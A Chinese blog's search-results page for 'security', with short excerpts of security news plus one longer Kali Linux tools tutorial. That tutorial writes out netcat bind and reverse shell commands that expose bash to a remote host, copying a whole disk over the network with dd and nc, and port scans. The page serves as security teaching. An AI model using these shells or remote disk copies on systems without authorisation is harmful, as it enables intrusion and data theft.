搜索[安全]结果-低调大师优秀个人博客

精选列表

搜索[安全]，共10000篇文章

GhostBSD 21.09.06 正式发布，注重安全与稳定性的 FreeBSD 发行版

GhostBSD 是一个FreeBSD发行版，它注重安全与稳定性，以一张自启动运行光盘的形式来提供。新版本的主要新特性是将服务管理从 OpenRC 迁移到 FreeBSD rc.d。

2021-09-09

AI将在网络安全领域取代人类？两者并不冲突

近年来，人工智能技术一直是网络安全行业的热门话题。诸如安全编排、自动化响应平台等解决方案，以及其他人工智能和驱动的技术，通常被视为应对网络安全的重要工具。

2021-08-03

网络钓鱼盯上WhatsApp等即时通讯软件卡巴斯基给出安全建议

鉴于许多黑客已经瞄上了 WhatsApp、Viber 和 Telegram 等即时通讯服务来开展网络钓鱼攻击和诈骗，卡巴斯基安全研究人员也特地对此类 Android 客户端的风险等级展开了一番评估。

2021-07-16

《网络产品安全漏洞管理规定》将于9日1日起施行

工业和信息化部国家互联网信息办公室公安部 2021年7月12日《网络产品安全漏洞管理规定》全文第一条为了规范网络产品安全漏洞发现、报告、修补和发布等行为，防范网络安全风险，根据《中华人民共和国网络安全法

2021-07-13

安全事件周报：SolarWinds 黑客在丹麦央行藏匿数月；LinkedIn 遭遇数据泄露

报告编号：B6-2021-070501 报告来源：360CERT 报告作者：360CERT 更新日期：2021-07-05 事件导览本周收录安全热点12项，话题集中在网络攻击、数据安全方面，涉及的组织有

2021-07-06

Chrome 浏览器将获得 HTTPS-Only 模式，以实现全局安全浏览

Google 正在努力为 Chrome 浏览器添加 HTTPS-Only 模式，通过该模式将所有的连接调整为 HTTPS 来保护用户的网络流量不被篡改。这项新功能目前正在 Mac、Windows、Linux、Chrome OS 和 Android 平台的 Chrome 93 Canary 预览版中进行测试。虽然该功能目前还没有登陆 Chrome 正式版本，但根据 Chrome 更新路线图的计划，HTTPS-Only 模式有望在 8 月 31 日随 Chrome 93 正式版一同推出。 Google 在今年 3 月就为 Chrome 90 推出了 HTTPS 优先模式，在该模式下如果用户没有指定 URL 协议，浏览器将默认采用 HTTPS 协议访问网站，如果网站本身不支持 HTTPS，才会转而使用 HTTP 协议。 HTTPS-Only 模式则更加严格，该模式只会采用 HTTPS 协议访问网站。如果网站不支持 HTTPS 协议的话，那么在访问这类网站时，Chrome 浏览器会在加载之前弹出警告。通过将网站的所有连接升级为 HTTPS，Chrome 浏览器将保护用户免受中间人攻击（MITM），这些攻击试图窥探通过未加密的 HTTP 协议与互联网服务器交换的数据。通过 HTTP 发送和接收的敏感信息（如密码、信用卡信息和其他类似数据）也可能被运行在用户受影响的计算机上的恶意软件所获取。如果你想现在就试用上这个实验性功能，你首先得安装最新版本的 Chrome Canary，其次需要进入 “chrome://flags/#https-only-mode-setting”，在里面启用 “HTTPS-Only Mode Setting”。

2021-07-03

开源软件安全隐患：80% 的第三方库从未更新

但开源库不断发展，今天看起来安全的东西明天可能就不再安全了，这可能会给软件供应商和用户带来巨大的安全风险。研究发现，库的流行度和漏洞每年都有明显的波动。

2021-06-24

PAM和google模块双因子安全验证时间同步chrony 自动安装系统Cobbler

# 1、PAM和google模块实现ssh双因子安全验证 **pam_google_authenticator模块** 功能：实现SSH登录的两次身份验证，先验证APP的数字码，再验证root用户的密码

2021-06-22

信息安全深透测试与工房（五）Kali 环境下的常用工具

Kali 系统环境下有着不少非常实用的工具软件，对我们去测试网络和检测系统有很大的帮助。因为前一段时间我去备考建造师，所以有三个月没有更新了，这次我就多写一些。 1、首先我来介绍一款网络工具NETCAT—NC 在网络工具中有“瑞士军刀”美誉的NetCat，在我们用了N年了至今仍是爱不释手。 nc的作用（1）实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口（2）端口的扫描，nc可以作为client发起TCP或UDP连接（3）机器之间传输文件（4）机器之间网络测速命令 nc -vn 123.126.97.79 110 -vn:是以客户端去连接，不进行DNS解释 123.126.97.79 110：后面跟要探测的IP地址和端口号。如下，我们先找一下163邮箱的IP，然后去检测端口：也可以连接80端口，我们测试MSF平台：命令 NC—传输⽂本信息 A：nc -l -p 333 #服务器先打开一个侦听端口 -p 333：设置端口号 B：nc –nv 10.1.1.12 333 #作为客户端去连接 10.1.1.12 333：服务器端的IP+端口号远程电⼦取证信息收集查看非常多的内容时，可以保存到一个文件里。-q 1：信息传输完成后1秒钟后自动退出。 NC—传输⽂件/目录传输文件 A：nc -lp 333 > 1.mp4 #正向传输 B：nc -nv 1.1.1.1 333 < 1.mp4 –q 1 或 A：nc -q 1 -lp 333 < a.mp4 #反向传输 B： nc -nv 1.1.1.1 333 > 2.mp4 传输目录 A：tar -cvf - music/ | nc -lp 333 –q 1 B：nc -nv 1.1.1.1 333 | tar -xvf 加密传文件 A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1 NC—流媒体服务 A： cat 1.mp4 | nc -lp 333 B： nc -nv 10.1.1.13 333 | mplayer -vo x11 -cache 3000 NC—端⼝扫描 nc -nvz 192.168.58.20 1-65535 #-z：扫描要探测的TCP端口 nc –vnzu 192.168.58.20 1-1024 #-zu：扫描要探测的UDP端口 NC—远程克隆硬盘 A： nc -lp 333 | dd of=/dev/sda B： dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1 远程电⼦取证，可以将目标服务器硬盘远程复制，或者内存。 NC——远程控制正向： A：nc -lp 333 -c bash B：nc 1.1.1.1 333 反向： A：nc -lp 333 B：nc 1.1.1.1 333 -c bash #注：Windows⽤户把bash改成cmd； NC——NCAT Nc缺乏加密和⾝份验证的能⼒，Ncat包含于nmap⼯具包中 A：ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl B：ncat -nv 1.1.1.1 333 –ssl 2、WIRESHARK抓包软件 Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包，并尽可能显示出最为详细的网络封包资料。在这里我们先选中使用什么网卡来抓包，一定要选中混杂模式，这样才能抓取所有的数据包：怎样去使用或者是利用Wireshark软件，我这里不详细的去说，因为这个软件太强大，所以还是自己去网上找相关的内容去看吧。但有几点我们要注意：一个个的数据包查看效率不高，可以直接查看完整的数据流。对着其中一个数据包右键：可以查看统计，去认识整个抓包里的详细数据：可以去WIRESHARK网站去下载特定类型的数据去学习和判断问题。https://wiki.wireshark.org/SampleCaptures/ 可以去查看专家信息，来分析问题： 3、TCPDUMP抓包软件它就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。非图形化工具，Linux、Unix系统默认安装。这个软件我是觉得一般的技术人员用的不多，这里只是了解一下就可以了。 tcpdump -i eth0 -s 0 -w file.pcap #抓取eth0网卡数据包 tcpdump -r file.pcap #读取刚才抓取的数据包文件 tcpdump -n -r http.cap | awk '{print $3}'| sort –u #只显示文件中第三列的内容，并剔除重复项。 tcpdump -n src host 145.254.160.237 -r http.cap #只显示源地址为254.160.237的数据包 tcpdump -n port 53 -r http.cap #显示端口号为53的数据包 tcpdump -A -n 'tcp[13] = 24' -r http.cap #高级筛选显示TCP的第13号字节，数值等于24的数据包。 4、Dradis过程文档记录 Dradis它是数据管理和报告工具。 apt-get install dradis #安装此软件运行dradis软件按上面红框内的地址，使用浏览器打开（第一次打开设置新密码）：软件主界面：其实这个软件具体怎么用其实我也不太清楚！！！网上也很少有相关介绍文章，英语好的同学可以上外网去学习。好了这期我做的时间确实有些长，但我这期的内容也是不少，希望各位看官能够满意。下期接着讲怎样使用Kali里面的工具进行网络中被动信息收集。

2021-06-17

72 个网络应用安全实操要点，全方位保护你的 Web 应用

7、采用内容安全策略，避免 XSS 漏洞内容安全策略（CSP）可以很好地防御 XSS（跨站点脚本）攻击、点击劫持攻击等。所以，一定要用它！

2021-06-10

安全机构调查显示，2021 年 Android 银行类恶意软件数量增长 159%

当企业在持续的勒索软件攻击下步履维艰时，Android 用户也正日益成为银行恶意软件的目标，安全机构 ESET 调查显示，在过去几个月中此类恶意软件数量增长了 159%。

2021-06-07

Chrome 改进 Enhanced Safe Browsing 功能，强化扩展程序和文件下载安全性

Google 在 Chrome 浏览器中为 Enhanced Safe Browsing（增强型安全浏览）增加了新的保护功能，如今在安装不受信任的扩展程序时将向用户发出警告，并允许用户要求对下载文件进行更深入的扫描

2021-06-04

首席信息安全官如何不错过与首席数据官的合作机会?

首席信息安全官可以利用首席数据官的数据知识和治理技能加强安全，而首席数据官可以利用首席信息安全官的内部和外部威胁知识保护数据。两者之间可以更好地开展合作。

2021-05-27

nginx 1.20.1 稳定版和 1.21.0 主线版发布，修复高危安全漏洞

这两个版本均修复了一个高危的安全漏洞——1-byte memory overwrite。

2021-05-27

Gartner预测2021年全球安全和风险管理支出将超过1500亿美元

全球领先的信息技术研究和顾问公司Gartner预测，2021年全球信息安全和风险管理技术与服务支出预计将增长12.4%，达到1504亿美元。2020年安全和风险管理支出增长率为6.4%。

2021-05-26

Palo Alto Networks发布Q3财报网络安全热度带来利好

Palo Alto Networks近日发布了令人印象深刻的第三季度财报结果，并提高了未来预期，表明企业逐渐加强对网络安全的重视使得这家厂商得到了迅速的发展。

2021-05-26

Magisk 创作者吴泓霖加入 Google，任职于 Android 安全团队

今天，Magisk 的开发者吴泓霖（John Wu）宣布，他将加入 Google 的 Android 安全团队。

2021-05-18

调查称英国百万级用户使用不安全路由器

根据消费者监督机构调查的结果，多家互联网服务提供商，如EE、Sky和Virgin Media向用户提供的定制路由器中，有超过三分之二的路由器存在缺陷或者安全问题。

2021-05-10

CISA发布公告提醒通用电气电源管理设备存在安全缺陷

美国网络安全与基础设施安全局(CISA)通告，通用电气生产的 Universal Relay(UR)系列电源管理设备中存在严重的安全漏洞。

2021-04-11

合成身份欺诈：用“真假”信息找到你 - 网络·安全技术周刊第482期

【责任编辑：贺鑫 TEL：（010）68476606】

2021-04-07

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长，特征是大鼻子、头戴帽子、身穿背带裤，还留着胡子。与他的双胞胎兄弟路易基一起，长年担任任天堂的招牌角色。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。